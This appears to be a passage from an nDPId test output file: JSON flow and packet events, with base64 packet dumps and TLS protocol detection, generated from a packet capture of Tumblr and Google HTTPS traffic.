-00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14189,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1605292116554,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292116554,"pkt":"qtsDr8lk5EKm5WPyht1gB1DkACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACAO5PoBu5jg6U77lZSLgBAB9bFqAAABAQgKob1mQcLdFBA="} -00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14190,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292116554,"flow_last_seen":1605292116554,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292116554,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::200e","src_port":58616,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14190,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1605292116554,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292116554,"pkt":"qtsDr8lk5EKm5WPyht1gCkAwACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACAO5PgBu6pVAe\/PmdazgBAB9nEsAAABAQgKob1mQcLdFA4="} 
-00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14191,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292116554,"flow_last_seen":1605292116554,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292116554,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::200e","src_port":58614,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14191,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1605292116554,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292116554,"pkt":"qtsDr8lk5EKm5WPyht1gCnAxACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACAO5PYBu2KmMmkBhhCygBAB9hx4AAABAQgKob1mQcLdFA8="} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14192,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292116783,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgFAAAAAAAAIAIqAcsBIEmLB5kd7IUo3\/YpAbvHENPnmMC3biY8gBANvdD5AAABAQgKwt3K6VRlt1w="} 
-00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14193,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292116783,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgVAAAAAAAAIAMqAcsBIEmLB5kd7IUo3\/YpAbvBWD0wAeZaM44SgBAN0gneAAABAQgKwt3K8eX1FWk="} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14194,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292116783,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgKAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbuyivK2F+GRCjWfgBAMggWaAAABAQgKwt3K8ViSDUk="} -00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14195,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292116783,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAA35IcYqAcsBIEmLB5kd7IUo3\/YpAbuqUp8VmAL\/uLoKgBALilfCAAABAQgKwt3K8Ev+J\/w="} 
-00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14196,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292116783,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgVAAAAAAAAIAIqAcsBIEmLB5kd7IUo3\/YpAbuMNGE5TmUER3k8gBALhgqfAAABAQgKwt3K8YvcoGw="} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14197,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292116783,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgJAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbvBOAuKJ+lo8zNmgBALjxSdAAABAQgKwt3K8thacjc="} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14198,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292116783,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgFAAAAAAAAIAMqAcsBIEmLB5kd7IUo3\/YpAbushBIGKmVwrG4jgBANXT4sAAABAQgKwt3K8WUYg3I="} 
-00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14199,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292116783,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgVAAAAAAAAIAMqAcsBIEmLB5kd7IUo3\/YpAbvBipT7vGL368ShgBALhSEJAAABAQgKwt3K8eX1Gck="} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14200,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292116783,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgFAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbvk9gGGELJipjJqgBALQBJ2AAABAQgKwt3K8aG8sBY="} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14201,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292116783,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgFAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbvk+M+Z1rOqVQHwgBALQGcqAAABAQgKwt3K8aG8sBU="} 
-00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14202,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292116783,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgJAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbvBNmN7X0wHcAwfgBALjg4+AAABAQgKwt3K8thacg8="} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14203,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292116783,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgFAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbvk+vuVlIuY4OlPgBALOKdvAAABAQgKwt3K8qG8sBY="} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14204,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292116783,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgLAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbvhvNVWQYa3RpcegBALd4k3AAABAQgKwt3K8rgmZ+0="} 
-00611{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23343,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292118602,"flow_last_seen":1605292118602,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292118602,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d582","src_port":50906,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23343,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1605292118602,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292118602,"pkt":"qtsDr8lk5EKm5WPyht1gAi73ACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADYOtWCxtoBu1KGqo810Lv\/gBAB9aO7AAABAQgKDow6U8LdGxc="} -00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23344,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292118714,"flow_last_seen":1605292118714,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292118714,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::2004","src_port":48988,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23344,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1605292118714,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292118714,"pkt":"qtsDr8lk5EKm5WPyht1gADFFACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIEQAAAAAAACAEv1wBu54AWFX+ZWnrgBAB9ax4AAABAQgKIY6128LdIt0="} -00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23345,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1605292118777,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292118777,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAANg61YIqAcsBIEmLB5kd7IUo3\/YpAbvG2jXQu\/9ShqqQgBAMVq52AAABAQgKwt3S6w6JbWQ="} -00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23346,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1605292118786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292118786,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgRAAAAAAAAIAQqAcsBIEmLB5kd7IUo3\/YpAbu\/XP5laeueAFhWgBALgb+AAAABAQgKwt3S8iGL6TM="} 
-00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23347,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292119370,"flow_last_seen":1605292119370,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292119370,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200e","src_port":57770,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23347,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1605292119370,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292119370,"pkt":"qtsDr8lk5EKm5WPyht1gB9dmACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICwAAAAAAACAO4aoBuwkMYXdt3wkTgBAGDPrTAAABAQgKuCcls8LdJNk="} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23348,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1605292119458,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292119458,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgLAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbvhqm3fCRMJDGF4gBAMQfSOAAABAQgKwt3Va7gmdTA="} 
-00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23349,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292120654,"flow_last_seen":1605292120654,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292120654,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::200e","src_port":58004,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23349,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1605292120654,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292120654,"pkt":"qtsDr8lk5EKm5WPyht1gBWy\/ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACAO4pQBuzf4sNBRRFrJgBAB9RDeAAABAQgKzK1LLsLdJJ0="} -00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23350,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292120654,"flow_last_seen":1605292120654,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292120654,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":55014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23350,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1605292120654,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292120654,"pkt":"qtsDr8lk5EKm5WPyht1gD6CDACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBgAAAAAAACAO1uYBu2Ue7VYDxGJbgBAB9U4jAAABAQgKcJlSucLdI9M="} -00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23351,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292120654,"flow_last_seen":1605292120654,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292120654,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::2004","src_port":49002,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23351,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1605292120654,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292120654,"pkt":"qtsDr8lk5EKm5WPyht1gCJJIACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIEQAAAAAAACAEv2oBu3NXQRgXN+V5gBAZpzN2AAABAQgKIY69b8LdKhI="} 
-00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23359,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1605292120839,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292120839,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgIAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbvilFFEWsk3+LDRgBALmwajAAABAQgKwt3a98yslWg="} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23360,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1605292120853,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292120853,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgGAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbvW5gPEYltlHu1XgBALmkPeAAABAQgKwt3bBnCYnCU="} -00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23362,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1605292120853,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292120853,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgRAAAAAAAAIAQqAcsBIEmLB5kd7IUo3\/YpAbu\/ahc35XlzV0EZgBAPBj1lAAABAQgKwt3bBiGODSw="} 
-00611{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23415,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292121486,"flow_last_seen":1605292121486,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605292121486,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a16","src_port":43328,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23415,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1605292121486,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292121486,"pkt":"qtsDr8lk5EKm5WPyht1gCYf1ACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABKcpoWqUABuwNc+osAAAAAoAL9IJMMAAACBAWgBAIICpi1TMUAAAAAAQMDBw=="} -00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23416,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1605292121507,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292121507,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAEpymhYqAcsBIEmLB5kd7IUo3\/YpAbupQGb5NYUDXPqMoBJXgPvWAAACBAV4AQMDAwQCCArC3d2UmLVMxQ=="} 
-00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23417,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1605292121507,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292121507,"pkt":"qtsDr8lk5EKm5WPyht1gCYf1ACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABKcpoWqUABuwNc+oxm+TWGgBAB+3\/SAAABAQgKmLVM28Ld3ZQ="} -00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23418,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292121486,"flow_last_seen":1605292121507,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605292121507,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a16","src_port":43328,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"catasters.tumblr.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23420,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292121674,"flow_last_seen":1605292121674,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292121674,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:817::200a","src_port":55560,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23420,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1605292121674,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292121674,"pkt":"qtsDr8lk5EKm5WPyht1gDKQRACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFwAAAAAAACAK2QgBu\/13v36ZlfzugBAB9Zh5AAABAQgKG7m2dMLdLYw="} -01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":23421,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292121486,"flow_last_seen":1605292121697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":1917,"flow_avg_l4_payload_len":319,"midstream":0,"thread_ts_msec":1605292121697,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a16","src_port":43328,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"},"tls": 
